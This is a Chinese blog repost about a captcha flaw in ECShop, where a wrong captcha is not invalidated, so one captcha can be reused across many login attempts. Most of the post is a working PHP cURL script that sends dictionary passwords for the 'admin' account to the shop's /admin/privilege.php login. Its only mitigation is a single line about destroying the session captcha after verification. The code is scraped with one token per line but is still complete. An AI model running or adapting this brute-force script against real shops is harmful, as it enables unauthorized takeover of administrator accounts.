博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
ecshop绕过验证码暴力破解
阅读量:4550 次
发布时间:2019-06-08

本文共 1834 字,大约阅读时间需要 6 分钟。

若验证码不匹配,并没有销毁当前验证码
 
所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用 
1.获取正确的验证码
 
2.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php
$site
=
''
;
$admin_path
=
'/admin/privilege.php'
;
$captcha
=
'上一步获取的验证码'
;
$referer
=
$site
;
function
getH(
$url
,
$postdata
=
array
()){
global
$ch
,
$referer
;
$options
=
array
( CURLOPT_URL =>  
$url
,
                   
CURLOPT_HEADER => false,
CURLOPT_TIMEOUT=> 0.11,
//CURLOPT_FILE=>$f,
CURLOPT_RETURNTRANSFER=>true,
                      
CURLOPT_REFERER=>
$referer
,
 
//CURLOPT_POST=>1,
CURLOPT_HTTPHEADER=>
array
(
'Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1'
,
'Expect:'
),
CURLOPT_USERAGENT=>
'ie'
                
);
           
if
(!
empty
(
$postdata
)){
$options
[CURLOPT_POSTFIELDS]=http_build_query(
$postdata
);
}
$ret
= curl_setopt_array(
$ch
,
$options
);
//$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串,而不是直接输出到浏览器
  
$ret
= curl_exec(
$ch
);
 
    
$info
= curl_getinfo(
$ch
);
 
    
if
(
empty
(
$info
[
'http_code'
])) {
        
die
(
"No HTTP code was returned"
);
    
}
else
if
(
$info
[
'http_code'
]==200) {
//响应码为200
        
return
$ret
;
 
 
    
}
else
{
        
#var_dump(
$info
);  
        
echo
'<br />'
;
        
echo
(
'响应码:'
.
$info
[
'http_code'
]);
//
        
echo
'<br />'
;
        
echo
$postdata
[
'username'
].
'  ---'
.
$postdata
[
'password'
];
        
echo
'<br />'
;
    
}
 
 
}
 
$url
=
$site
.
$admin_path
;
$data
=
array
(
    
'username'
=>
'admin'
,
    
'password'
=>
'123456ad'
,
    
'captcha'
=>
$captcha
,
    
'act'
=>
'signin'
    
);
//词典
$passwds
=
array
(
'1'
,
'2'
,
'3'
,
'123456a'
,
'123456'
,
'123456ds'
);
foreach
(
$passwds
as
$p
){
    
$data
[
'password'
]=
$p
;
    
$res
=
strip_tags
(getH(
$url
,
$data
));
    
if
(
stripos
(
$res
,
'您输入的帐号信息不正确'
)){
        
echo
'no'
;
    
}
    
echo
'<br>------------------------<br>'
;
}

 

修复方案:

验证识别后销毁session中的验证码 

转载于:https://www.cnblogs.com/sprinng/p/3662592.html

你可能感兴趣的文章
ZMQ示例:使用 curve 进行加密通信
查看>>
【网络流】 SGU 194 Reactor Cooling 无源无汇上下界可行流(裸题)
查看>>
cmd命令大全
查看>>
SSM框架---详细整合教程
查看>>
hdu 1907 尼姆博弈
查看>>
hdu 2177 威佐夫博弈变形
查看>>
面试问题联想
查看>>
IOS数据持久化之归档NSKeyedArchiver
查看>>
你应该首先保护哪些应用程序?这个问题本身问错了!
查看>>
C++之检测文件结尾
查看>>
【Delphi】注册快捷键
查看>>
字符串、文件操作,英文词频统计预处理
查看>>
[TJOI2014]Alice and Bob[拓扑排序+贪心]
查看>>
[SDOI2017]天才黑客[最短路、前缀优化建图]
查看>>
Asp.Net中的三种分页方式
查看>>
在线文件格式转换
查看>>
如何在eclipse中使用XYLayout布局?在此介绍如何把XYLayout导入到eclipse .
查看>>
sql之left join、right join、inner join的区别(转)
查看>>
C#调用ArcGIS REST服务
查看>>
JDBC 使用详解
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-10-17 07:25:44   当前IP: 18.118.126.195   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我